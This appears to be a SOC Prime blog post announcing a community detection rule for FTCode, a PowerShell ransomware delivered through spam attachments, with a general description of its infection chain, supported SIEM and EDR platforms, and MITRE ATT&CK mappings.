Detection Content: FTCode Ransomware

Today, we want to draw your attention to another ransomware targeting at Italian-speaking users. First spotted by the researchers back in 2013, FTCode is PowerShell based ransomware that is distributed via spam.

In the recent attacks, the FTCode ransomware was delivered to the victim machines with an email containing an attachment pretending to be an invoice, application form, etc. containing macros, or the VBS script file. Users usually open the door for the malicious script by enabling the macros, or try out the attached script file. When the PowerShell script is launched, FTCode is downloaded. After receiving the command from its C&C server, the ransomware not only encrypts the system, but also steals sensitive user’s data such as login credentials, and sends them to the server.

The recently posted detection content by the member of Threat Bounty Program Emir Erdogan spots the FTCode ransomware:

https://tdm.socprime.com/tdm/info/Q7oowPwEYKFt/vfYoyHMBQAH5UgbBiUJ3/

The rule has translations for the following platforms:

SIEM: ArcSight, QRadar, Splunk, Graylog, Sumo Logic, ELK Stack, LogPoint, Humio

EDR: Carbon Black, Elastic Endpoint

MITRE ATT&CK: 

Tactics: Impact, Execution, Persistence, Privilege Escalation

Techniques: Data Encrypted for Impact (T1486), Inhibit System Recovery (T1490), PowerShell (T1086), Scheduled Task (T1053)


Ready to try out SOC Prime TDM? Sign up for free.

Or join Threat Bounty Program to craft your own content and share it with the TDM community.